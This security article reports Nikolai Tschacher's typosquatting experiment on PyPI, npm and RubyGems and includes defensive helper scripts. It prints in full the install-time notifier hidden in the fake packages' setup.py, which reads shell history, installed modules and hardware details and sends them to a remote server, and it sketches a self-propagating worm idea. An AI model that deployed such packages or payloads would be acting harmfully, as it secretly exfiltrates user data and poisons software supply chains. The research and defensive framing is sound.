Typosquatting in Python, Node.js, and Ruby repositories
The attack has proven effective for distributing malicious code through the PyPI (Python), npmjs.com (Node.js), and rubygems.org (Ruby) repositories.
It turns out that typosquatting is not limited to domain names. German security specialist Nikolai Tschacher has demonstrated how easy it is to distribute malicious code through PyPI, the package index for software written in Python, as well as through the Node.js (npmjs.com) and Ruby (rubygems.org) repositories.
The idea is simple: publish a package with a typo in its name, then wait for someone to make the same typo in their console:
> sudo pip install reqeusts
In a small experiment conducted for research purposes, Nikolai infected more than 17,000 computers. 43.6% of the installations ran with administrator rights, including on servers in the .gov and .mil government domains.
Typosquatting and Bitsquatting
Attackers have long used typosquatting to steer stray traffic to otherwise meaningless sites such as microsodft.com. The attack works because of the law of large numbers: if a billion people type a site's URL into the address bar, a million of them will make some kind of mistake, and about a thousand will land on a prepared site where an exploit pack with a fresh 0-day is waiting for them. Alternatively, the owner can simply run ads on such sites and make money out of thin air.
Traditional typosquatters register thousands of addresses. More careful companies register the likely typo variants along with their main domain and set up redirects. Some even use typosquatting to pick up someone else's traffic: for example, Google redirects traffic from the domain duck.com to itself.
There is also bitsquatting, an exotic variety of typosquatting that counts on a hardware error rather than a human one. Bitsquatting relies on the fact that, now and then, some device connected to the Internet accidentally flips a single bit of the domain name in a DNS query, so the traffic goes to the attacker's site instead of the original one. Such attacks target the domains of CDNs and ad networks, whose content is loaded by thousands of popular sites: domains like fbcdn.net, 2mdn.net and akamai.com.
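To make the single-bit idea concrete, here is a minimal sketch of how a defender might enumerate the bitsquatting variants of a domain, for example to register or monitor them. The function name bitflip_variants and the decision to flip bits only in the first label (leaving the rest of the name untouched) are assumptions made for this illustration, not something taken from the research described here.

```python
import string

# Characters that may appear in a DNS label: letters, digits, hyphen.
VALID_CHARS = set(string.ascii_lowercase + string.digits + "-")


def bitflip_variants(domain):
    """Return domains whose first label differs from `domain` by one flipped bit."""
    label, dot, rest = domain.lower().partition(".")
    variants = set()
    for i, ch in enumerate(label):
        for bit in range(8):
            # Flip one bit of the character; DNS names are case-insensitive,
            # so normalise the result to lower case before comparing.
            flipped = chr(ord(ch) ^ (1 << bit)).lower()
            if flipped == ch or flipped not in VALID_CHARS:
                continue
            candidate = label[:i] + flipped + label[i + 1:]
            # A label may not start or end with a hyphen.
            if candidate.startswith("-") or candidate.endswith("-"):
                continue
            variants.add(candidate + dot + rest)
    return sorted(variants)


if __name__ == "__main__":
    for name in bitflip_variants("fbcdn.net"):
        print(name)
```

For instance, the output for fbcdn.net includes gbcdn.net, because 'f' (0x66) and 'g' (0x67) differ only in the lowest bit.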
Nikolai Tschacher studied standard typosquatting techniques and asked himself: how many people mistype a package name when they install packages manually through a package manager? For example, the pip package manager downloads packages from the PyPI repository. If we upload an arbitrary package called reqeusts (anyone can upload to the repository) alongside the legitimate requests package, our package will be downloaded and installed by every user who makes that typo when typing the command.
To test the effectiveness of the attack, Nikolai created 214 packages with various kinds of typos in their names, including names of standard library modules that were not registered in the repository (for example, urllib2), and kept them in the repositories for several months in the second half of 2015 and early 2016.
In the Python packages, the code was hidden in the setup.py file, which runs with the privileges of the installing user, and therefore as administrator when pip is invoked with sudo. For the NPM modules a pre-installation script was written, while the Ruby packages required some tinkering.
When each dummy typosquatting package was installed, it sent a notification to the server with the IP address, operating system, user rights and timestamp.
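As an illustration of what "a typo in the name" can mean, the sketch below generates simple one-edit variants of a package name: a dropped character, a doubled character, and two swapped neighbours. The function name typo_variants and the choice of these three typo classes are assumptions for this example. The thesis may have used a different or larger set. A maintainer could use such a list to check which look-alike names are already registered.

```python
def typo_variants(name):
    """Return one-edit typos of `name`: omission, duplication, transposition."""
    variants = set()
    for i in range(len(name)):
        # Omission: drop one character ("requests" -> "reqests").
        variants.add(name[:i] + name[i + 1:])
        # Duplication: type one character twice ("requests" -> "rrequests").
        variants.add(name[:i] + name[i] + name[i:])
    for i in range(len(name) - 1):
        # Transposition: swap two neighbours ("requests" -> "reqeusts").
        variants.add(name[:i] + name[i + 1] + name[i] + name[i + 2:])
    # Swapping two identical neighbours reproduces the original name.
    variants.discard(name)
    return sorted(variants)


if __name__ == "__main__":
    print(typo_variants("requests"))
```

The list produced for requests contains reqeusts, the misspelling used in the example command at the top of the article.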
Notifier Code
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Notification program used in the typo squatting
bachelor thesis for the python package index.
Created in autumn 2015.
Copyright by Nikolai Tschacher
"""
import os
import ctypes
import sys
import platform
import subprocess
debug = False
# we are using Python3
if sys.version_info[0] == 3:
    import urllib.request
    from urllib.parse import urlencode
    GET = urllib.request.urlopen
    def python3POST(url, data={}, headers=None):
        """
        Returns the response of the POST request as string or
        False if the resource could not be accessed.
        """
        data = urllib.parse.urlencode(data).encode()
        request = urllib.request.Request(url, data)
        try:
            reponse = urllib.request.urlopen(request, timeout=15)
            cs = reponse.headers.get_content_charset()
            if cs:
                return reponse.read().decode(cs)
            else:
                return reponse.read().decode('utf-8')
        except urllib.error.HTTPError as he:
            # try again if some 400 or 500 error was received
            return ''
        except Exception as e:
            # everything else fails
            return False
    POST = python3POST
# we are using Python2
else:
    import urllib2
    from urllib import urlencode
    GET = urllib2.urlopen
    def python2POST(url, data={}, headers=None):
        """
        See python3POST
        """
        req = urllib2.Request(url, urlencode(data))
        try:
            response = urllib2.urlopen(req, timeout=15)
            return response.read()
        except urllib2.HTTPError as he:
            return ''
        except Exception as e:
            return False
    POST = python2POST
try:
    from subprocess import DEVNULL # py3k
except ImportError:
    DEVNULL = open(os.devnull, 'wb')
def get_command_history():
    if os.name == 'nt':
        # handle windows
        # http://serverfault.com/questions/95404/
        #is-there-a-global-persistent-cmd-history
        # apparently, there is no history in windows :(
        return ''
    elif os.name == 'posix':
        # handle linux and mac
        cmd = 'cat {}/.bash_history | grep -E "pip[23]? install"'
        return os.popen(cmd.format(os.path.expanduser('~'))).read()
def get_hardware_info():
    if os.name == 'nt':
        # handle windows
        return platform.processor()
    elif os.name == 'posix':
        # handle linux and mac
        if sys.platform.startswith('linux'):
            try:
                hw_info = subprocess.check_output('lshw -short',
                                                  stderr=DEVNULL, shell=True)
            except:
                hw_info = ''
            if not hw_info:
                try:
                    hw_info = subprocess.check_output('lspci',
                                                      stderr=DEVNULL, shell=True)
                except:
                    hw_info = ''
            hw_info += '\n' +\
                os.popen('free -m').read().strip()
            return hw_info
        elif sys.platform == 'darwin':
            # According to https://developer.apple.com/library/
            # mac/documentation/Darwin/Reference/ManPages/
            # man8/system_profiler.8.html
            # no personal information is provided by detailLevel: mini
            return os.popen('system_profiler -detailLevel mini').read()
def get_all_installed_modules():
    # first try the default path
    pip_list = os.popen('pip list').read().strip()
    if pip_list:
        return pip_list
    else:
        if os.name == 'nt':
            paths = ('C:/Python27',
                     'C:/Python34',
                     'C:/Python26',
                     'C:/Python33',
                     'C:/Python35',
                     'C:/Python',
                     'C:/Python2',
                     'C:/Python3')
            # try some paths that make sense to me
            for loc in paths:
                pip_location = os.path.join(loc, 'Scripts/pip.exe')
                if os.path.exists(pip_location):
                    cmd = '{} list'.format(pip_location)
                    try:
                        pip_list = subprocess.check_output(cmd,
                                                           stderr=DEVNULL, shell=True)
                    except:
                        pip_list = ''
                    if pip_list:
                        return pip_list
    return ''
def notify_home(url, package_name, intended_package_name):
    host_os = platform.platform()
    try:
        admin_rights = bool(os.getuid() == 0)
    except AttributeError:
        try:
            ret = ctypes.windll.shell32.IsUserAnAdmin()
            admin_rights = bool(ret != 0)
        except:
            admin_rights = False
    if os.name != 'nt':
        try:
            pip_version = os.popen('pip --version').read()
        except:
            pip_version = ''
    else:
        pip_version = platform.python_version()
    url_data = {
        'p1': package_name,
        'p2': intended_package_name,
        'p3': 'pip',
        'p4': host_os,
        'p5': admin_rights,
        'p6': pip_version,
    }
    post_data = {
        'p7': get_command_history(),
        'p8': get_all_installed_modules(),
        'p9': get_hardware_info(),
    }
    url_data = urlencode(url_data)
    response = POST(url + url_data, post_data)
    if debug:
        print(response)
    print('')
    print("Warning!!! Maybe you made a typo in your installation\
    command or the module does only exist in the python stdlib?!")
    print("Did you want to install '{}'\
    instead of '{}'??!".format(intended_package_name, package_name))
    print('For more information, please\
    visit http://svs-repo.informatik.uni-hamburg.de/')
def main():
    if debug:
        notify_home('http://localhost:8000/app/?',
                    'pmba_basic', 'pmba_basic')
    else:
        notify_home('http://svs-repo.informatik.uni-hamburg.de/app/?',
                    'pmba_basic', 'pmba_basic')
if __name__ == '__main__':
    main()
The results were stunning. The notification server received 45,334 installation notifications from 17,289 unique IP addresses.
Most installations came from the dummy PyPI packages: 15,221 unique IP addresses. Rubygems.org accounted for 1,631 installations and NPM for 525. On average, each package was installed 92 times. The most popular was urllib2, with 3,929 unique installations.
The victims were spread across operating systems: Linux (8,614), Windows (6,174), OS X (4,758) and others (57).
Mapping the IP addresses to hosts gave the following picture.
Figure: Hosts by country
The full research results are published in Nikolai Tschacher's thesis.
The author also suggests that this type of attack could be used to spread a worm that mines the console command history on Linux and OS X to find new typos that are not yet in its database.
In theory, the worm could search for new attack vectors (new typos) on its own, generate new packages, upload them to the repository along with its own code, and thus spread further.
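The same command-history idea can be turned around for defence. The sketch below scans shell history lines for pip install commands and flags package names that look like near-misses of packages you actually use. Everything named here is an assumption for illustration: the KNOWN_PACKAGES allow-list, the suspicious_installs function, and the 0.8 similarity cutoff. The fuzzy matching uses difflib.get_close_matches from the Python standard library.

```python
import difflib
import re

# Hypothetical allow-list; a real one would come from your own requirements.
KNOWN_PACKAGES = ("requests", "numpy", "django", "flask")

# Matches "pip install ...", "pip2 install ..." and "pip3 install ...".
INSTALL_RE = re.compile(r"\bpip[23]?\s+install\s+(.+)")


def suspicious_installs(history_lines, known=KNOWN_PACKAGES, cutoff=0.8):
    """Return (typed_name, likely_intended) pairs for near-miss package names."""
    findings = []
    for line in history_lines:
        match = INSTALL_RE.search(line)
        if not match:
            continue
        for token in match.group(1).split():
            if token.startswith("-"):
                continue  # skip command-line options such as --upgrade
            # Strip version specifiers and extras, e.g. "requests==2.0".
            name = re.split(r"[=<>!~\[]", token, maxsplit=1)[0].lower()
            if not name or name in known:
                continue
            close = difflib.get_close_matches(name, known, n=1, cutoff=cutoff)
            if close:
                findings.append((name, close[0]))
    return findings


if __name__ == "__main__":
    history = ["sudo pip install reqeusts", "pip3 install numpy", "ls -la"]
    print(suspicious_installs(history))
```

With the sample history above, only reqeusts is flagged, as a likely misspelling of requests. A lower cutoff catches more distant typos at the cost of more false positives.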